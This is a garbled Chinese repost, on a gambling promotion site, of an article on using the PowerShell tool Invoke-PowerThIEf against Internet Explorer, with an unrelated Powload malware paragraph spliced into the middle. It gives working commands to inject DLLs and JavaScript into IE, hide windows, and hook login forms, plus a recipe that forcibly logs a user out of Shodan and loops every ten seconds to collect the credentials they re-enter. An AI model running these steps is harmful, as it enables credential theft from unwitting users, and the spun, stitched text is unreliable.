申博新官网:Invoke-PowerThIEf应用剖析 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

申博新官网:Invoke-PowerThIEf应用剖析

申博_新闻事件 申博 56次浏览 已收录 0个评论

申博会员网

在线娱乐平台首选申博会员网!不可胜举的游戏种类,令人叹为观止的系统流畅度,热情似火的招待。不怕你来了想要离开,就怕你还没有来。AG亚游集团告诉你,什么是真正十年如一日优质的服务,什么是一流的游戏体验!

,

0x00 媒介

Invoke-PowerThIEf是一个开源的Powershell剧本,不仅能够用来对IE浏览器窗口的内容举行操纵,还能经由过程Hook的要领捕捉IE浏览器的凭证。

地点以下:

https://github.com/nettitude/Invoke-PowerThIEf

本文将要对Invoke-PowerThIEf的功用举行测试,分享在Win7 sp1 x64下的运用要领,连系本身的履历,剖析应用思绪。

0x01 简介

本文将要引见以下内容:

· 功用测试

· Win7Sp1下的运用要领

· 应用剖析

0x02 功用测试

Invoke-PowerThIEf须要的环境设置以下:

· IE 11

· Win 7-10

· .Net 4.0+

· Powershell 4.0

考虑到以下缘由:

· Window7或Windows Server 2008,默许装置PowerShell 2.0

· Windows8或Windows server 2012,默许装置PowerShell 3.0

· Windows 8.1或Windows server 2012 R2,默许装置PowerShell 4.0

起首挑选Windows server 2012 R2 x64作为测试环境,可直接运转。

经常运用功用以下:

(1)列出IE浏览器的一切页面

Invoke-PowerThIEf -action ListUrls

(2)在IE历程中加载dll

示例以下:

Invoke-PowerThIEf -action ExecPayload -PathPayload calc_x64.dll

默许会在一切页面中实行加载dll的操纵,而且会新建新的页面。

比方:

假如当前IE历程有3个页面,实行该操纵后会实行3次加载dll的操纵,而且会在IE浏览器中新建3个页面。

个人认为该功用的效果有限。

(3)向IE页面中插进去JavaScript代码并实行

针对一切页面:

Invoke-PowerThIEf -action InvokeJS -Script <JavaScript to run>

针对指定页面:

Invoke-PowerThIEf -action InvokeJS -BrowserIndex <BrowserIndex> -Script <JavaScript to run>

注:

<BrowserIndex>可经由过程ListUrls敕令取得。

示例以下:

Invoke-PowerThIEf -action InvokeJS -Script 'alert(document.location.href);'

Invoke-PowerThIEf -action InvokeJS -BrowserIndex 132572 -Script "alert(`"1`");"

(4)Dump页面内容

针对一切页面:

Invoke-PowerThIEf -action DumpHTML

针对指定页面:

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex>

针对指定页面的指定元素:

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType tag -Selector <type>

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType id -Selector <id>

Invoke-PowerThIEf -action DumpHTML -BrowserIndex <BrowserIndex> -SelectorType name -Selector <name>

(5)隐蔽和显现页面

隐蔽一切页面:

Invoke-PowerThIEf -action HideWindow

隐蔽指定页面:

Invoke-PowerThIEf -action HideWindow -BrowserIndex <BrowserIndex>

显现一切页面:

Invoke-PowerThIEf -action ShowWindow

显现指定页面:

Invoke-PowerThIEf -action ShowWindow -BrowserIndex <BrowserIndex>

这里会对页面地点的历程iexploer.exe举行隐蔽和显现。

比方:

假如历程iexploer1.exe下有两个页面A和B,历程iexploer2.exe下有两个页面C和D,假如隐蔽页面A,那末会隐蔽历程iexploer1.exe下的一切页面A和B,而iexploer2.exe下有的两个页面C和D不受影响。

(6)页面重定向

掌握页面接见指定的URL。

针对一切页面:

Invoke-PowerThIEf -action Navigate -NavigateUrl <URL>

针对指定页面:

Invoke-PowerThIEf -action Navigate -BrowserIndex <BrowserIndex> -NavigateUrl <URL>

(7)捕捉凭证

这里分为两个步骤:

1.敕令实行后,将会Hook一切新翻开的页面并纪录凭证。

Invoke-PowerThIEf -action HookLoginForms

2.检察已捕捉的凭证。

Invoke-PowerThIEf -action Creds

(8)新建页面

Invoke-PowerThIEf -action NewBackgroundTab

0x03 Win7Sp1下的运用要领

这里运用的测试体系为Win7Sp1 x64。

Invoke-PowerThIEf直接在Win7sp1下运用会报错,提醒以下:

Unable to find type [System.__ComObject]: make sure that the assembly containin
g this type is loaded.
At C:\test\Invoke-PowerThIEf.ps1:151 char:41
+         [OutputType([System.__ComObject] <<<< )]
    + CategoryInfo          : InvalidOperation: (System.__ComObject:String) []
   , ParentContainsErrorRecordException
    + FullyQualifiedErrorId : TypeNotFound

这里须要装置Microsoft .NET Framework 4.5和Windows Management Framework 4.0。

1.装置Microsoft .NET Framework 4.5

Powload最新绕过技术分析

Powload最初是作为其他恶意软件的催化剂出现了公众视野中的,比如为模块化银行木马Emotet服务。之后,由于Powload融合简单感染方法和持续发展的特征,作为网络犯罪的工具,其中就包含绕过安全技术的能力。 经过6个月5万个样本的分析,Trend研究人员分析出Powload如何加入新技术来增强其有效性,尤其是绕过检测的能力。 Powload 典型的Powload攻击会使用社会工程技术来诱使用户来点击邮件附件,比如将邮件伪装成来自供应商的发票。Powload样本一般使用含有VBA宏的附件,点击后会激活隐藏的PowerShell进程来下载和执行恶意软件payload。大多数Powload变种会加入混淆技术来绕过基于哈希的检测方法。 PowerShell脚本仍然是下载和执行恶意

敕令行下的装置要领可参考之前的文章《渗入基本——敕令行下装置Microsoft .NET Framework》

完成自动装置的代码可参考:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/Install_.Net_Framework_from_the_command_line.cpp

装置后须要守候体系从新启动才见效。

2.装置Windows Management Framework 4.0

下载地点:

https://www.microsoft.com/en-us/download/details.aspx?id=40855

敕令行下的装置敕令以下:

wusa.exe Windows6.1-KB2819745-x64-MultiPkg.msu /quiet /norestart

装置胜利后历程wusa.exe将会自动退出。

一样须要守候体系重启启动才见效。

再次实行Invoke-PowerThIEf。

报错提醒以下:

Add-Type : Could not load file or assembly 'Microsoft.mshtml,
Version=7.0.3300.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' or one
of its dependencies. The system cannot find the file specified.
At C:\test\Invoke-PowerThIEf.ps1:362 char:13
+             Add-Type -TypeDefinition $source -Language CSharp
-ReferencedAssembl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~
    + CategoryInfo          : NotSpecified: (:) [Add-Type], FileNotFoundExcept
   ion
    + FullyQualifiedErrorId : System.IO.FileNotFoundException,Microsoft.PowerS
   hell.Commands.AddTypeCommand

毛病的缘由是代码中运用了:using mshtml; ,缺乏这个援用文件。

Invoke-PowerThIEf在Server2012R2下能够一般运用,因而我尝试比较Server2012R2和Win7体系的差别,看看可否经由过程替代文件的体式格局处理这个题目。

处理要领1

参考资料:

【已解决】两种版本mshtml:.NET中的Microsoft.mshtml的Microsoft.mshtml.dll和COM中的Microsoft HTML Object Library的mshtml.tlb之间的区别

在装置VS2015的Server2012R2下尝试导出mshtml.dll,敕令以下:

C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Bin\x64\tlbimp.exe C:\Windows\System32\mshtml.tlb /out:c:\test\mshtml.dll

取得mshtml.dll

将mshtml.dll放在Invoke-PowerThIEf的同级目录下,重命名为Microsoft.mshtml.dll

实行后依旧是一样的毛病,以下图:

申博新官网:Invoke-PowerThIEf应用剖析

该要领失利

处理要领2

经由对照,发明Server2012R2比Win7体系多了文件夹:C:\Windows\assembly\GAC\Microsoft.mshtml

以下图:

申博新官网:Invoke-PowerThIEf应用剖析

详细多出以下文件:

C:\Windows\assembly\GAC>tree Microsoft.mshtml /f
Folder PATH listing
Volume serial number is F4B2-E12B
C:\WINDOWS\ASSEMBLY\GAC\MICROSOFT.MSHTML
└───7.0.3300.0__b03f5f7f11d50a3a
        Microsoft.mshtml.dll
        __AssemblyInfo__.ini

注:

C:\Windows\assembly下文件夹的详细内容只能经由过程敕令行举行检察,没法在Explorer中检察。

因而尝试将Server2012R2体系中C:\Windows\assembly\GAC\Microsoft.mshtml的一切内容复制到Win7下面。

我已将C:\Windows\assembly\GAC\Microsoft.mshtml的一切内容提取出来并上传至github,地点以下:

https://github.com/3gstudent/Invoke-PowerThIEf/tree/master/Microsoft.mshtml

在Win7体系的敕令行下实行:

xcopy Microsoft.mshtml C:\Windows\assembly\GAC\Microsoft.mshtml /i /s /e

再次实行Invoke-PowerThIEf,运转胜利,以下图:

申博新官网:Invoke-PowerThIEf应用剖析

0x04 应用剖析

Invoke-PowerThIEf的应用场景主要有以下3个:

1.掌握IE浏览器接见指定页面并取得网页内容

(1)建立一个新页面

Invoke-PowerThIEf -action NewBackgroundTab

(2)取得新页面的序号

Invoke-PowerThIEf -action ListUrls

假定这里的序号为132572

(3)将其重定向到指定URL

这里以https://www.shodan.io/为例

Invoke-PowerThIEf -action Navigate -BrowserIndex 132572 -NavigateUrl https://www.shodan.io/

(4)抓取页面效果

Invoke-PowerThIEf -action DumpHTML -BrowserIndex 132572

(5)封闭此页面

Invoke-PowerThIEf -action InvokeJS -BrowserIndex 132572 -Script "window.opener=null;window.open('','_self');window.close();"

补充:重定向到空缺页面

Invoke-PowerThIEf -action Navigate -BrowserIndex 132572 -NavigateUrl about:blank

2.抓取凭证

(1)列出一切标签

Invoke-PowerThIEf -action ListUrls

发明背景有shodan的登录页面。

(2)开启抓取凭证的功用

Invoke-PowerThIEf -action HookLoginForms

(3)强迫shodan账号退出登录状况

Invoke-PowerThIEf -action InvokeJS -BrowserIndex 525660 -Script "window.location.href = 'https://account.shodan.io/logout';"

守候用户从新登录。

(4)检察抓取到的凭证

Invoke-PowerThIEf -action Creds

这里须要注重,实行完步骤2后不能退出Powershell历程,不然没法抓取到新的凭证。

假如想要自动完成以上功用,这里能够经由过程加轮回的要领完成每隔10秒在背景抓取凭证,运用的Powershell敕令以下:

Invoke-PowerThIEf -action HookLoginForms
while(1)
{
    Start-Sleep –s 10
    Write-host "[*] Sleep 10 seconds"
    Invoke-PowerThIEf -action Creds
}

实行剧本:

powershell -ep bypass -f Invoke-PowerThIEf.ps1

3.修正页面内容,实行JavaScript代码

针对一切页面:

Invoke-PowerThIEf -action InvokeJS -Script <JavaScript to run>

针对指定页面:

Invoke-PowerThIEf -action InvokeJS -BrowserIndex <BrowserIndex> -Script <JavaScript to run>

要完成的功用取决于详细的JavaScript代码。

0x05 小结

本文引见了Invoke-PowerThIEf支撑的功用,分享在Win7 sp1 x64下的运用要领,连系本身的履历,剖析应用思绪。

原文地点: https://www.4hou.com/technology/21641.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明申博新官网:Invoke-PowerThIEf应用剖析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址